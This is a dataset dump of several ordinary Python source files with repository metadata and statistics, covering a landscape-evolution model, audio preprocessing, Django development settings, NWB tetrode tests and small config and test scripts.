| 25.75 | 81 | 0.734628 | 36 | 309 | 6.166667 | 0.555556 | 0.252252 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139159 | 309 | 11 | 82 | 28.090909 | 0.834586 | 0 | 0 | 0 | 0 | 0 | 0.36246 | 0.071197 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.111111 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
bb5494d212a707197321c71bdad0900003edabec | 1,201 | py | Python | sample_synth02/make_config.py | clinfo/DeepKF | ee4f1be28e5f3bfa46bb47dbdc4d5f678eed36c1 | [
"MIT"
] | 5 | 2019-12-19T13:33:36.000Z | 2021-06-01T06:08:16.000Z | sample_synth02/make_config.py | clinfo/DeepKF | ee4f1be28e5f3bfa46bb47dbdc4d5f678eed36c1 | [
"MIT"
] | 24 | 2020-03-03T19:40:55.000Z | 2021-05-26T15:27:38.000Z | sample_synth02/make_config.py | clinfo/DeepKF | ee4f1be28e5f3bfa46bb47dbdc4d5f678eed36c1 | [
"MIT"
] | 1 | 2019-12-19T13:35:07.000Z | 2019-12-19T13:35:07.000Z | import numpy as np
import os
import json
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
os.makedirs("data",exist_ok=True)
np.random.seed(10)
filename="config_base.json"
o=json.load(open(filename))
print(o)
for j in range(10):
i=j+1
o['data_train_npy']='data/data_train.n'+str(i)+'.npy'
o['data_test_npy']='data/data_test.n'+str(i)+'.npy'
path="experiments/result_base_"+str(i)+"/"
o["result_path"]=path
os.makedirs(path,exist_ok=True)
cfg_path="experiments/config/"
os.makedirs(cfg_path,exist_ok=True)
filename=cfg_path+"/config_base"+str(i)+".json"
print(filename)
f = open(filename, "w")
json.dump(o, f)
filename="config_pot.json"
o=json.load(open(filename))
print(o)
for j in range(10):
i=j+1
o['data_train_npy']='data/data_train.n'+str(i)+'.npy'
o['data_test_npy']='data/data_test.n'+str(i)+'.npy'
path="experiments/result_pot_"+str(i)+"/"
o["result_path"]=path
os.makedirs(path,exist_ok=True)
cfg_path="experiments/config/"
os.makedirs(cfg_path,exist_ok=True)
filename=cfg_path+"/config_pot"+str(i)+".json"
print(filename)
f = open(filename, "w")
json.dump(o, f)
| 25.020833 | 57 | 0.673605 | 201 | 1,201 | 3.860697 | 0.228856 | 0.041237 | 0.070876 | 0.041237 | 0.762887 | 0.762887 | 0.762887 | 0.762887 | 0.762887 | 0.762887 | 0 | 0.007744 | 0.139883 | 1,201 | 47 | 58 | 25.553191 | 0.743466 | 0 | 0 | 0.65 | 0 | 0 | 0.265221 | 0.039199 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 |
bb55579c6f96ecbc21cea483d25ad02b38e7aa01 | 92 | py | Python | plot_bokeh/__init__.py | amarkpayne/ampayne_tools | a47e9baa70edaedfb655ab51f79bf5035eaacd83 | [
"MIT"
] | null | null | null | plot_bokeh/__init__.py | amarkpayne/ampayne_tools | a47e9baa70edaedfb655ab51f79bf5035eaacd83 | [
"MIT"
] | null | null | null | plot_bokeh/__init__.py | amarkpayne/ampayne_tools | a47e9baa70edaedfb655ab51f79bf5035eaacd83 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, print_function
from plot_bokeh.plot_bokeh import *
| 23 | 54 | 0.858696 | 13 | 92 | 5.461538 | 0.615385 | 0.253521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 92 | 3 | 55 | 30.666667 | 0.865854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
bb5619127572d5c7abef2ce8289d84bfdb46675d | 6,075 | py | Python | content/model_funcs.py | nathanlyons/sensitivity_analysis_clinic_CSDMS_2019 | ca1ae2cdc5239bae755929f6a92d669a82192813 | [
"MIT"
] | null | null | null | content/model_funcs.py | nathanlyons/sensitivity_analysis_clinic_CSDMS_2019 | ca1ae2cdc5239bae755929f6a92d669a82192813 | [
"MIT"
] | null | null | null | content/model_funcs.py | nathanlyons/sensitivity_analysis_clinic_CSDMS_2019 | ca1ae2cdc5239bae755929f6a92d669a82192813 | [
"MIT"
] | null | null | null | """Model functions sensitivity analysis clinic at CSDMS 2019.
Written by Nathan Lyons, May 2019
"""
from os.path import join
from landlab import RasterModelGrid
from landlab.components import FastscapeEroder, FlowAccumulator, LinearDiffuser
from landlab.io import write_esri_ascii
import numpy as np
import experiment_funcs as ef
def calculate_factor_values(levels):
"""Calculate values of trial factors.
Parameters
----------
levels : dictionary
The factor levels of the trial.
Returns
-------
dictionary
Calculated factor values.
"""
# Set parameters based on factor levels.
f = {
'U': 10**levels['U_exp'],
'K': 10**levels['K_exp'],
'D': 10**levels['D_exp'],
'base_level_fall': 10**levels['base_level_fall']}
return f
def run_model(f, output_path):
"""Run a trial of the base level fall model.
Parameters
----------
f : dictionary
Model trial factors.
output_path : string
Path where outputs will be saved.
"""
# Set parameters.
nrows = 200
ncols = 100
dx = 100
dt = 1000
# Create initial topography with random elevation values.
mg = RasterModelGrid(nrows, ncols, dx)
z = mg.add_zeros('node', 'topographic__elevation')
np.random.seed(1)
z += np.random.rand(z.size)
mg.set_closed_boundaries_at_grid_edges(right_is_closed=True,
top_is_closed=False,
left_is_closed=True,
bottom_is_closed=False)
# Instantiate model components.
fa = FlowAccumulator(mg, flow_director='D8')
sp = FastscapeEroder(mg, K_sp=f['K'], m_sp=0.5, n_sp=1)
ld = LinearDiffuser(mg, linear_diffusivity=f['D'], deposit=False)
# Set variables to evaluate presence of steady state.
initial_conditions_set = False
at_steady_state = False
relief_record = []
recent_mean = []
recent_std = []
step = 0
# Set number of time steps, `steps_ss` that is the time window to evaluate
# steady state.
steps_ss = 1000
# Create a dictionary to store responses.
response = {}
# Run model until steady state is reached.
uplift_per_step = f['U'] * dt
core_mask = mg.node_is_core()
print('Running model until elevation reaches steady state.')
while not at_steady_state:
fa.run_one_step()
sp.run_one_step(dt)
ld.run_one_step(dt)
z[core_mask] += uplift_per_step
at_steady_state = check_steady_state(step * dt, z, step, steps_ss,
relief_record, recent_mean,
recent_std)
if at_steady_state and not initial_conditions_set:
initial_conditions_set = True
# Save elevation of the initial conditions.
fn = join(output_path, 'initial_conditions_elevation.asc')
write_esri_ascii(fn, mg, ['topographic__elevation'], clobber=True)
# Retain steady state relief, `relief_ss`.
z_core = z[mg.core_nodes]
relief_ss = z_core.max() - z_core.min()
response['relief_at_steady_state'] = relief_ss
# Find steady state divide position.
divide_y_coord_initial = get_divide_position(mg)
# Perturb elevation.
base_level_nodes = mg.y_of_node == 0
z[base_level_nodes] -= f['base_level_fall']
at_steady_state = False
elif at_steady_state and initial_conditions_set:
response['time_back_to_steady_state'] = step * dt
# Get divide migration distance.
divide_y_coord_final = get_divide_position(mg)
d = divide_y_coord_final - divide_y_coord_initial
response['divide_migration_distance'] = d
# Save final elevation.
fn = join(output_path, 'final_elevation.asc')
write_esri_ascii(fn, mg, ['topographic__elevation'], clobber=True)
# Advance step counter.
step += 1
# Write response to file.
path_r = join(output_path, 'response.csv')
ef.write_data(response, path_r)
def check_steady_state(time, z, step, step_win, relief_record, recent_mean,
recent_std):
relief_record.append(z.max() - z.min())
if step < step_win:
# If fewer than `step_win` time steps have occurred, calculate the
# running mean and standard deviation the entire elapsed time period.
recent_mean.append(np.mean(relief_record))
recent_std.append(np.std(relief_record))
else:
# If more than `step_win` time steps have occurred, calculate the
# running mean and standard deviation over the most recent `step_win`
# time steps.
recent_mean.append(np.mean(relief_record[-step_win:]))
recent_std.append(np.std(relief_record[-step_win:]))
mean_pct_change = (np.abs(recent_mean[-1] - recent_mean[-step_win]) /
np.abs(recent_mean[-1] + recent_mean[-step_win]))
std_pct_change = (np.abs(recent_std[-1] - recent_std[-step_win]) /
np.abs(recent_std[-1] + recent_std[-step_win]))
# If the percent change is less than 1% for both the mean and
# standard deviation, flag the system as at steady state.
thresh = 0.01
minor_mean_change = mean_pct_change < thresh
minor_std_change = std_pct_change < thresh or recent_std[-1] == 0
at_steady_state = minor_mean_change and minor_std_change
if step % 1e3 == 0 or at_steady_state:
print('ss_check:', 'time', time, 'mean_pct_change',
mean_pct_change, 'std_pct_change', std_pct_change)
return at_steady_state
def get_divide_position(grid):
z = grid.at_node['topographic__elevation'].reshape(grid.shape)
z_row_mean = z.mean(axis=1)
divide_y_coord = z_row_mean.argmax() * grid.dy
return divide_y_coord
| 33.196721 | 79 | 0.624691 | 790 | 6,075 | 4.53038 | 0.272152 | 0.06147 | 0.039955 | 0.018441 | 0.18888 | 0.17463 | 0.148645 | 0.111763 | 0.111763 | 0.075999 | 0 | 0.012649 | 0.28428 | 6,075 | 182 | 80 | 33.379121 | 0.810488 | 0.233745 | 0 | 0.042105 | 0 | 0 | 0.085293 | 0.042207 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042105 | false | 0 | 0.063158 | 0 | 0.136842 | 0.021053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb565d6a848c25f10f712bae53673495afeccc03 | 4,865 | py | Python | src/preprocessing.py | jimmystique/AudioClassification | 9f9966306068cff7419f6c190752bab4d35b3870 | [
"MIT"
] | null | null | null | src/preprocessing.py | jimmystique/AudioClassification | 9f9966306068cff7419f6c190752bab4d35b3870 | [
"MIT"
] | null | null | null | src/preprocessing.py | jimmystique/AudioClassification | 9f9966306068cff7419f6c190752bab4d35b3870 | [
"MIT"
] | null | null | null | import os
import pandas as pd
import pickle as pkl
import numpy as np
import argparse
import yaml
import librosa
import scipy
from scipy.io import wavfile
import multiprocessing
import time
import datetime
import socket
def resample_wav_data(wav_data, orig_sr, target_sr):
""" Resample wav_data from sampling rate equals to orig_sr to a new sampling rate equals to target_sr
"""
# resampled_wav_data = librosa.core.resample(y=wav_data.astype(np.float32), orig_sr=orig_sr, target_sr=target_sr)
resampled_wav_data = scipy.signal.resample(wav_data, target_sr)
# print(wav_data, resampled_wav_data, len(resampled_wav_data))
return resampled_wav_data
def pad_wav_data(wav_data, vect_size):
""" Pad wav data
"""
if (len(wav_data) > vect_size):
raise ValueError("")
elif len(wav_data) < vect_size:
padded_wav_data = np.zeros(vect_size)
starting_point = np.random.randint(low=0, high=vect_size-len(wav_data))
padded_wav_data[starting_point:starting_point+len(wav_data)] = wav_data
else:
padded_wav_data = wav_data
return padded_wav_data
def fft_preprocess_user_data_at_pth(user_data_path, preprocessed_data_path, vect_size):
print(user_data_path)
user_df = pd.DataFrame(columns=['data', "user_id", "record_num", "label"])
wav_user_id = 0
for file in sorted(os.listdir(user_data_path)):
if file.endswith(".wav"):
wav_label, wav_user_id, wav_record_n = os.path.splitext(file)[0].split("_")
wav_sr, wav_data = wavfile.read(os.path.join(user_data_path, file))
resampled_wav_data = resample_wav_data(wav_data, wav_sr, vect_size)
# new_row = {"data": padded_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
new_row = {"data": resampled_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
user_df = user_df.append(new_row, ignore_index=True)
pkl.dump( user_df, open("{}_preprocessed.pkl".format(os.path.join(preprocessed_data_path, str(wav_user_id))), "wb" ) )
def downsampling_preprocess_user_data_at_pth(user_data_path, preprocessed_data_path, target_sr, vect_size):
print(user_data_path)
user_df = pd.DataFrame(columns=['data', "user_id", "record_num", "label"])
wav_user_id = 0
for file in sorted(os.listdir(user_data_path)):
if file.endswith(".wav"):
wav_label, wav_user_id, wav_record_n = os.path.splitext(file)[0].split("_")
wav_sr, wav_data = wavfile.read(os.path.join(user_data_path, file))
y,s = librosa.load(os.path.join(user_data_path, file), target_sr)
padded_wav_data = pad_wav_data(y, vect_size)
new_row = {"data": padded_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
user_df = user_df.append(new_row, ignore_index=True)
pkl.dump(user_df, open("{}_preprocessed.pkl".format(os.path.join(preprocessed_data_path, str(wav_user_id))), "wb" ) )
def preprocess(raw_data_path, preprocessed_data_path, resampling_method, n_process, vect_size, target_sr=8000,):
#Create preprocessed_data_path if the directory does not exist
if not os.path.exists(preprocessed_data_path):
os.makedirs(preprocessed_data_path)
users_data_path = sorted([folder.path for folder in os.scandir(raw_data_path) if folder.is_dir() and any(file.endswith(".wav") for file in os.listdir(folder))])
print(users_data_path)
# pool=multiprocessing.Pool(n_process)
pool=multiprocessing.Pool(1)
if resampling_method == 'fft':
print("Resampling with FFT ...")
pool.starmap(fft_preprocess_user_data_at_pth, [[folder, preprocessed_data_path, vect_size] for folder in users_data_path if os.path.isdir(folder)], chunksize=1)
elif resampling_method == 'downsampling':
print("Resampling by downsampling ...")
pool.starmap(downsampling_preprocess_user_data_at_pth, [[folder, preprocessed_data_path, target_sr, vect_size] for folder in users_data_path if os.path.isdir(folder)], chunksize=1)
else:
raise ValueError(f"method {method} does not exist")
if __name__ == "__main__":
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--preprocessing_cfg", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
preprocessing_cfg = yaml.safe_load(open(args.preprocessing_cfg))["preprocessing"]
t1 = time.time()
preprocess(**preprocessing_cfg)
t2 = time.time()
with open("logs/logs.csv", "a") as myfile:
myfile.write("{:%Y-%m-%d %H:%M:%S},data preprocessing,{},{},{:.2f}\n".format(datetime.datetime.now(),socket.gethostname(),preprocessing_cfg['n_process'],t2-t1))
print("Time elapsed for data processing: {} seconds ".format(t2-t1))
#Preprocessing : ~113s using Parallel computing with n_processed = 10 and resampling with scipys
#Preprocessing : ~477.1873028278351 seconds using Parallel computing with n_processed = 10 and resampling with resampy (python module for efficient time-series resampling)
| 41.581197 | 182 | 0.763001 | 765 | 4,865 | 4.539869 | 0.227451 | 0.068529 | 0.057587 | 0.020155 | 0.460121 | 0.415203 | 0.406565 | 0.394472 | 0.394472 | 0.366254 | 0 | 0.010638 | 0.111202 | 4,865 | 116 | 183 | 41.939655 | 0.792553 | 0.159096 | 0 | 0.25974 | 0 | 0 | 0.115328 | 0.006856 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064935 | false | 0 | 0.168831 | 0 | 0.25974 | 0.077922 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb5669ae64601c0a6365ad7e4ed02e95b6e730f0 | 506 | py | Python | tests/builtins/test_dir.py | VeliborKrivokuca/batavia | ecbdc21dc7e002415e6c0ea8654d2b8a8c7a85fa | [
"BSD-3-Clause"
] | 1,256 | 2015-08-09T07:44:02.000Z | 2019-03-27T05:41:24.000Z | tests/builtins/test_dir.py | VeliborKrivokuca/batavia | ecbdc21dc7e002415e6c0ea8654d2b8a8c7a85fa | [
"BSD-3-Clause"
] | 406 | 2015-08-12T03:40:29.000Z | 2019-02-25T19:26:02.000Z | tests/builtins/test_dir.py | VeliborKrivokuca/batavia | ecbdc21dc7e002415e6c0ea8654d2b8a8c7a85fa | [
"BSD-3-Clause"
] | 589 | 2015-08-10T03:27:31.000Z | 2019-03-10T20:58:07.000Z | from ..utils import TranspileTestCase, BuiltinFunctionTestCase
class DirTests(TranspileTestCase):
pass
class BuiltinDirFunctionTests(BuiltinFunctionTestCase, TranspileTestCase):
function = "dir"
not_implemented = [
'test_class',
]
class BuiltinDirTypeFunctionTests(BuiltinFunctionTestCase, TranspileTestCase):
"""Test suite that ensures that dir(x) returns the correct type."""
function = "lambda x: type(dir(x))"
not_implemented = [
'test_class',
]
| 22 | 78 | 0.715415 | 44 | 506 | 8.136364 | 0.545455 | 0.223464 | 0.100559 | 0.128492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193676 | 506 | 22 | 79 | 23 | 0.877451 | 0.120553 | 0 | 0.307692 | 0 | 0 | 0.102506 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.076923 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
bb574f490a6c4afce6122ec48aebabf0148da56e | 3,999 | py | Python | threemegawatt/threemegawatt/settings/development.py | opemipoVRB/MeterTracker | 3c52e704844628db31b72d008983b6c090266775 | [
"MIT"
] | null | null | null | threemegawatt/threemegawatt/settings/development.py | opemipoVRB/MeterTracker | 3c52e704844628db31b72d008983b6c090266775 | [
"MIT"
] | null | null | null | threemegawatt/threemegawatt/settings/development.py | opemipoVRB/MeterTracker | 3c52e704844628db31b72d008983b6c090266775 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
↓↓...........................................................................↓↓
↓↓..........................↓↓↓↓↓↓↓↓↓↓↓↓↓....................................↓↓
↓↓.......................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓.................................↓↓
↓↓.....................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓...............................↓↓
↓↓....................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓..............................↓↓
↓↓...................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓.↓↓...............................↓↓
↓↓...................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓...↓↓..............................↓↓
↓↓...................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓.↓↓...↓↓↓.............................↓↓
↓↓...................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓..............................↓↓
↓↓....................↓↓↓↓↓↓↓↓↓↓↓↓↓.....↓↓↓↓↓↓↓↓↓............................↓↓
↓↓......................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓..↓↓↓↓↓↓↓............................↓↓
↓↓...................................↓↓↓.....................................↓↓
↓↓.................↓↓................↓↓↓↓ ↓↓↓↓↓↓↓........↓...................↓↓
↓↓...............↓↓↓↓↓↓..............↓↓↓↓↓↓↓↓↓↓↓↓↓...↓↓↓↓↓↓..................↓↓
↓↓............↓↓↓↓..↓↓↓↓↓.........................↓↓↓↓↓↓↓↓↓..................↓↓
↓↓............↓↓↓↓...↓↓↓↓↓↓↓....................↓↓↓↓↓↓.↓↓.↓↓.................↓↓
↓↓...............↓↓↓↓↓↓↓↓↓↓↓↓↓↓............↓↓↓↓↓↓↓↓..........................↓↓
↓↓.........................↓↓↓↓↓↓↓↓↓...↓↓↓↓↓↓↓...............................↓↓
↓↓..............................↓↓↓↓↓↓↓↓↓↓...................................↓↓
↓↓..........................↓↓↓↓↓....↓↓↓↓↓↓↓↓↓...............................↓↓
↓↓............↓↓.↓↓↓↓↓↓↓↓↓↓↓↓↓............↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓..................↓↓
↓↓............↓↓.↓↓..↓↓↓↓.....................↓↓↓↓↓↓↓↓↓↓↓↓↓↓.................↓↓
↓↓..............↓↓↓↓↓↓............................↓↓.↓↓↓↓↓↓↓.................↓↓
↓↓.................. ......................↓↓
↓↓.................. ↑↑↑ ↑↑↑ ↑↑↑↑↑↑↑ ↑↑↑↑↑↑↑ .......................↓↓
↓↓.................. ↑↑↑ ↑↑↑ ↑↑↑ ↑↑↑↑ ↑↑↑ ↑↑↑↑.....................↓↓
↓↓.................. ↑↑↨ ↑↑↑ ↑↑↨ ↨↑↑ ↑↑↨ ↨↑↑......................↓↓
↓↓.................. ↨↑↨ ↑↨↑ ↨↑↨ ↨↑↨ ↨↑↨ ↨↑↨......................↓↓
↓↓.................. ↑↨↑ ↨↑↨ ↨↨↑↨↑↨↨↑↑↨ ↨↨↑↨↑↨↨↑↑↨.....................↓↓
↓↓.................. ↨↑↨ ↨↨↨ ↨↨↨ ↨↨↨ ↨↨↨ ↨↨↨....................↓↓
↓↓.................. :↨: ↨↨: ↨↨: :↨↨ ↨↨: :::....................↓↓
↓↓................... ::↨↨:↨ :↨: :↨: :↨: :::....................↓↓
↓↓.................... :::: ::: ::: ::: :::....................↓↓
↓↓...................... : : : ::::::: ....................↓↓
↓↓...........................................................................↓↓
↓↓←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←↓↓
↓↓→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→↓↓
↓↓ development.py.py Created by Durodola Opemipo 2019 ↓↓
↓↓ Personal Email : <opemipodurodola@gmail.com> ↓↓
↓↓ Telephone Number: +2348182104309 ↓↓
↓↓→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→↓↓
↓↓←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←↓↓
"""
import os
from threemegawatt.settings.base import *
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env("DEBUG")
ALLOWED_HOSTS = ['localhost', '127.0.0.1']
| 58.808824 | 79 | 0.112778 | 257 | 3,999 | 6.389105 | 0.381323 | 0.119367 | 0.058465 | 0.034105 | 0.008526 | 0.008526 | 0 | 0 | 0 | 0 | 0 | 0.007283 | 0.107277 | 3,999 | 67 | 80 | 59.686567 | 0.118207 | 0.955739 | 0 | 0 | 0 | 0 | 0.202454 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
bb59b961461cedfb2ddeb8299bd41e4af9504caf | 5,260 | py | Python | {{ cookiecutter.namespace }}/src/pynwb/tests/test_tetrodeseries.py | TheChymera/ndx-template | 44ee210181d5770d037106acff345fe1d30e0477 | [
"BSD-3-Clause-LBNL"
] | 3 | 2020-02-06T01:18:47.000Z | 2022-01-05T21:21:38.000Z | {{ cookiecutter.namespace }}/src/pynwb/tests/test_tetrodeseries.py | TheChymera/ndx-template | 44ee210181d5770d037106acff345fe1d30e0477 | [
"BSD-3-Clause-LBNL"
] | 38 | 2019-05-15T19:07:12.000Z | 2022-01-27T01:26:57.000Z | {{ cookiecutter.namespace }}/src/pynwb/tests/test_tetrodeseries.py | TheChymera/ndx-template | 44ee210181d5770d037106acff345fe1d30e0477 | [
"BSD-3-Clause-LBNL"
] | 4 | 2019-05-15T18:03:42.000Z | 2020-05-08T11:38:53.000Z | import datetime
import numpy as np
from pynwb import NWBHDF5IO, NWBFile
from pynwb.core import DynamicTableRegion
from pynwb.device import Device
from pynwb.ecephys import ElectrodeGroup
from pynwb.file import ElectrodeTable as get_electrode_table
from pynwb.testing import TestCase, remove_test_file, AcquisitionH5IOMixin
from {{ cookiecutter.py_pkg_name }} import TetrodeSeries
def set_up_nwbfile():
nwbfile = NWBFile(
session_description='session_description',
identifier='identifier',
session_start_time=datetime.datetime.now(datetime.timezone.utc)
)
device = nwbfile.create_device(
name='device_name'
)
electrode_group = nwbfile.create_electrode_group(
name='electrode_group',
description='description',
location='location',
device=device
)
for i in np.arange(10.):
nwbfile.add_electrode(
x=i,
y=i,
z=i,
imp=np.nan,
location='location',
filtering='filtering',
group=electrode_group
)
return nwbfile
class TestTetrodeSeriesConstructor(TestCase):
def setUp(self):
"""Set up an NWB file. Necessary because TetrodeSeries requires references to electrodes."""
self.nwbfile = set_up_nwbfile()
def test_constructor(self):
"""Test that the constructor for TetrodeSeries sets values as expected."""
all_electrodes = self.nwbfile.create_electrode_table_region(
region=list(range(0, 10)),
description='all the electrodes'
)
data = np.random.rand(100, 3)
tetrode_series = TetrodeSeries(
name='name',
description='description',
data=data,
rate=1000.,
electrodes=all_electrodes,
trode_id=1
)
self.assertEqual(tetrode_series.name, 'name')
self.assertEqual(tetrode_series.description, 'description')
np.testing.assert_array_equal(tetrode_series.data, data)
self.assertEqual(tetrode_series.rate, 1000.)
self.assertEqual(tetrode_series.starting_time, 0)
self.assertEqual(tetrode_series.electrodes, all_electrodes)
self.assertEqual(tetrode_series.trode_id, 1)
class TestTetrodeSeriesRoundtrip(TestCase):
"""Simple roundtrip test for TetrodeSeries."""
def setUp(self):
self.nwbfile = set_up_nwbfile()
self.path = 'test.nwb'
def tearDown(self):
remove_test_file(self.path)
def test_roundtrip(self):
"""
Add a TetrodeSeries to an NWBFile, write it to file, read the file, and test that the TetrodeSeries from the
file matches the original TetrodeSeries.
"""
all_electrodes = self.nwbfile.create_electrode_table_region(
region=list(range(0, 10)),
description='all the electrodes'
)
data = np.random.rand(100, 3)
tetrode_series = TetrodeSeries(
name='TetrodeSeries',
description='description',
data=data,
rate=1000.,
electrodes=all_electrodes,
trode_id=1
)
self.nwbfile.add_acquisition(tetrode_series)
with NWBHDF5IO(self.path, mode='w') as io:
io.write(self.nwbfile)
with NWBHDF5IO(self.path, mode='r', load_namespaces=True) as io:
read_nwbfile = io.read()
self.assertContainerEqual(tetrode_series, read_nwbfile.acquisition['TetrodeSeries'])
class TestTetrodeSeriesRoundtripPyNWB(AcquisitionH5IOMixin, TestCase):
"""Complex, more complete roundtrip test for TetrodeSeries using pynwb.testing infrastructure."""
def setUpContainer(self):
""" Return the test TetrodeSeries to read/write """
self.device = Device(
name='device_name'
)
self.group = ElectrodeGroup(
name='electrode_group',
description='description',
location='location',
device=self.device
)
self.table = get_electrode_table() # manually create a table of electrodes
for i in range(10):
self.table.add_row(
x=i,
y=i,
z=i,
imp=np.nan,
location='location',
filtering='filtering',
group=self.group,
group_name='electrode_group'
)
all_electrodes = DynamicTableRegion(
data=list(range(0, 10)),
description='all the electrodes',
name='electrodes',
table=self.table
)
data = np.random.rand(100, 3)
tetrode_series = TetrodeSeries(
name='name',
description='description',
data=data,
rate=1000.,
electrodes=all_electrodes,
trode_id=1
)
return tetrode_series
def addContainer(self, nwbfile):
"""Add the test TetrodeSeries and related objects to the given NWBFile."""
nwbfile.add_device(self.device)
nwbfile.add_electrode_group(self.group)
nwbfile.set_electrode_table(self.table)
nwbfile.add_acquisition(self.container)
| 30.760234 | 116 | 0.61692 | 548 | 5,260 | 5.779197 | 0.242701 | 0.053363 | 0.04168 | 0.053047 | 0.293022 | 0.262709 | 0.262709 | 0.262709 | 0.211241 | 0.211241 | 0 | 0.013736 | 0.294106 | 5,260 | 170 | 117 | 30.941176 | 0.839214 | 0.007034 | 0 | 0.410853 | 0 | 0 | 0.070343 | 0 | 0 | 0 | 0 | 0 | 0.062016 | 0 | null | null | 0 | 0.069767 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
